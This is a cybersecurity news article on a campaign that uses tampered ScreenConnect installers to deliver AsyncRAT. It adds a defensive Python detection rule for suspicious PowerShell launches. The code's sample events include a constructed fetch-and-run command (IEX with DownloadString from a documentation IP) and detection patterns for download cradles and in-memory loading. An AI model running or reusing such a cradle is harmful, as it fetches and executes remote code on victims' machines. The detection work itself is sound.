Cybersecurity researchers have discovered that attackers are misusing ConnectWise ScreenConnect, a widely used remote access tool, to deliver AsyncRAT, a dangerous Remote Access Trojan. The malicious campaign is designed to steal sensitive data, login credentials, and even cryptocurrency from unsuspecting victims.

The attack begins when a victim downloads and runs a tampered version of the ScreenConnect installer. The file initially appears legitimate because it mimics the real software, and in some cases attackers abuse code signing so that it looks authentic. Once executed, the installer silently connects to attacker-controlled servers.

From there, the compromised ScreenConnect installer drops hidden scripts onto the victim’s computer. These scripts use PowerShell or similar techniques to load AsyncRAT directly into memory without leaving obvious files behind. This fileless approach lets the malware evade traditional antivirus tools, which largely rely on scanning files on disk, and makes it very difficult to detect.

Once installed, AsyncRAT gives hackers full control over the infected system. It can record keystrokes, steal saved browser passwords, capture screenshots, and monitor clipboard activity. This means that not only are online accounts at risk, but even copied crypto wallet addresses or recovery keys can be stolen and used for theft.

Security experts warn that the attack is particularly dangerous for individuals who manage cryptocurrency on their devices. Some campaigns have been seen deploying information stealers alongside AsyncRAT to specifically search for wallet files, seed phrases, and crypto-related data. This makes financial theft a major part of the attackers’ motive.

Several research teams have analyzed this threat in detail. Acronis Threat Research Unit reported that trojanized ScreenConnect installers were being used to drop multiple RATs, including AsyncRAT. Analysts from LevelBlue Labs highlighted that the malware runs directly in memory, while reports from The Hacker News confirmed that some attackers are targeting cryptocurrency wallets as well.

By abusing ScreenConnect, which is normally a trusted tool used by IT teams, attackers gain a powerful disguise for their activities. Many victims may not realize that anything is wrong because they believe they are installing legitimate software. This use of trusted platforms for malicious purposes makes the campaign even more convincing.

The overall risk is serious, as this campaign combines social engineering, stealthy fileless malware, and financial theft. Both businesses and individual users are at risk if they unknowingly install one of these trojanized installers. The attack also shows how cybercriminals are constantly evolving, finding ways to hide behind trusted technologies.

Experts advise downloading remote access tools only from official sources and keeping them updated to the latest version. ConnectWise has already issued security patches for known vulnerabilities, and applying them quickly is critical. Users should also enable multi-factor authentication, monitor for unusual system activity, and use advanced security solutions that can detect fileless threats.
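The fileless PowerShell staging described above, and the advice to monitor for unusual system activity, both come down to one detectable moment: an installer-like process spawning PowerShell with loader-style flags. The following is an added example written for this article, not code from the original report or from ConnectWise: a small triage rule run over constructed process-creation events (the kind of fields Sysmon or Windows process auditing record). The installer file name, paths and the 198.51.100.10 address are constructed for illustration and are not indicators from the campaign.

```python
"""
Triage rule for process-creation telemetry that flags PowerShell launched by an
installer-like parent with the tell-tale flags of an in-memory loader.
All sample events below are constructed, not real telemetry.
"""
import base64
import binascii
import ntpath
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str   # command line of the created process


# Flags and cmdlets commonly seen when a script stages a payload in memory.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "bypass_policy": re.compile(r"-e(?:xecutionpolicy|p)?\s+bypass", re.I),
    "download_cradle": re.compile(
        r"Net\.WebClient|DownloadString|DownloadData|Invoke-WebRequest|\biwr\b", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "reflective_load": re.compile(r"Reflection\.Assembly|FromBase64String", re.I),
}
# -EncodedCommand and its accepted abbreviations, followed by a base64 blob.
ENCODED_ARG = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# Parent names that suggest the launch came from an installer, not a user shell.
INSTALLER_PARENT = re.compile(r"setup|install|msiexec", re.I)


def decode_encoded_command(blob: str) -> Optional[str]:
    """PowerShell -EncodedCommand is base64 over UTF-16LE; return text or None."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le", errors="replace")
    except (binascii.Error, ValueError):
        return None


def analyze(event: ProcEvent) -> list:
    """Return the indicator names that fire on one event (empty if not PowerShell)."""
    if not event.image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return []
    hits = []
    text = event.command_line
    m = ENCODED_ARG.search(text)
    if m:
        hits.append("encoded_command")
        decoded = decode_encoded_command(m.group(1))
        if decoded:
            text = text + "\n" + decoded   # scan the payload, not just the wrapper
    for name, pattern in INDICATORS.items():
        if pattern.search(text):
            hits.append(name)
    if INSTALLER_PARENT.search(ntpath.basename(event.parent_image)):
        hits.append("installer_parent")
    return hits


def verdict(event: ProcEvent) -> str:
    """Three-tier outcome so routine admin use of PowerShell is not paged on."""
    n = len(analyze(event))
    if n >= 3:
        return "alert"
    if n >= 1:
        return "review"
    return "ok"


def _encode_ps(script: str) -> str:
    """Build a constructed -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed events; the installer name is assumed and 198.51.100.10 is a
# documentation address, not a real host.
TROJANIZED_INSTALLER = ProcEvent(
    r"C:\Users\alice\Downloads\ScreenConnect.ClientSetup.exe",
    PS,
    "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand "
    + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.10/stage.ps1')"),
)
MSI_POST_INSTALL = ProcEvent(
    r"C:\Windows\System32\msiexec.exe", PS,
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Temp\post-install.ps1",
)
ADMIN_SHELL = ProcEvent(
    r"C:\Windows\explorer.exe", PS,
    r"powershell.exe -NoProfile -Command Get-ChildItem C:\Temp",
)

if __name__ == "__main__":
    for ev in (TROJANIZED_INSTALLER, MSI_POST_INSTALL, ADMIN_SHELL):
        print(f"{verdict(ev):7} {ntpath.basename(ev.parent_image):32} {analyze(ev)}")
```

The rule deliberately decodes the `-EncodedCommand` blob and scans the decoded script as well as the outer command line, because the download cradle and `IEX` call that mark an in-memory loader are otherwise invisible to a plain string match. The three tiers keep a single weak signal (an MSI post-install script with a relaxed execution policy) at "review" rather than paging on it.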

For people who own cryptocurrency, extra caution is needed. Storing assets in hardware wallets, avoiding suspicious downloads, and never keeping recovery phrases on everyday computers can help reduce the risk. Since AsyncRAT has proven effective in stealing both login details and crypto, awareness and preventive steps are the best defense.

This campaign highlights once again how attackers exploit trust to spread powerful malware. By disguising AsyncRAT inside what looks like legitimate software, they gain control over victims’ machines and access to sensitive data. Staying vigilant and following good security practices are essential in reducing the chance of becoming the next target.

Stay alert, and keep your security measures updated!

Source: Follow cybersecurity88 on X and LinkedIn for the latest cybersecurity news